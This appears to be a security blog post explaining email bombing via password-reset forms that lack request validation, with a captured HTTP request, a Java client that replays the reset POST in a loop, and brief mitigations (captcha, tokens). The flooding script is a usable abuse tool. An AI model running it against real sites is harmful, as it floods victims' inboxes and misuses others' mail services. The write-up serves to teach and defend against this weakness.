Email notification service ;Email Bomber

Now a days every app has a module for notifying users through email. The same email module/service when written less carefully can lead to serious misuse by the attacker. Attacker can spam the inbox of any user when the app is vulnerable to this issue. Below is the example of vulnerable webapps test with explanation.

Suppose the reset password functionality is vulnerable to email bombing.

url – https://example.com/lost-password

Open it and you see a form to notify you by email. try putting email and send. Monitor and capture the request.

For now i take below headers:

POST /lost-password HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://example.com/lost-password
Cookie: lang=en; xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1

POST data
action=send
email=test@test.com

Looking at the header and body , we can see that their is no way for the web server to track user or to validate the genuine request. So we can replay the same request with different POST data using any client.

For example. Java client below.


import java.io.DataOutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

/**
 * @author Vaibs
 *
 */
public class TestEmail{

	private final String USER_AGENT = "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101/Vaibs/ Firefox/36.04";

	public static void main(String[] args) throws Exception {

		TestEmail http = new TestEmail();

		System.out.println("Testing email flooding - Send Http POST request");
		http.sendPost();

	}

	// HTTP POST request
	private void sendPost() throws Exception {

		// action urk
		String url = "https://example.com/lost-password";

		URL obj = new URL(url);

		for (int i = 0; i < 10; i++) {
			// Send post request
			HttpURLConnection con = (HttpURLConnection) obj.openConnection();

			// add basic reuqest header
			con.setRequestMethod("POST");
			con.setRequestProperty("User-Agent", USER_AGENT);
			con.setRequestProperty("Accept-Language", "en-US,en;q=0.5");
			con.setRequestProperty("Upgrade-Insecure-Requests", "1");
			con.setRequestProperty("Connection", "keep-alive");
			con.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
			con.setRequestProperty("Accept-Encoding", "gzip, deflate, br");

			// payload
			String urlParameters = "action=send&email=test@test.com";

			con.setDoOutput(true);
			DataOutputStream wr = new DataOutputStream(con.getOutputStream());
			wr.writeBytes(urlParameters);
			wr.flush();
			wr.close();

			int responseCode = con.getResponseCode();

			System.out.println(i + "   -----    " + responseCode);
		}

	}

}

Likewise i see several web-apps letting attackers use their email service as the way to spam the users inbox.

You can find the vulnerable spots on lost password page ,get the mobile app link page, OTP functionalities. And many other ways.

Below is are the common ways to get rid of spamming.

1. Captcha
2. Token exchange between client-server.ex Demo Download source

Leave a Reply

Your email address will not be published. Required fields are marked *

Blue Captcha Image
Refresh

*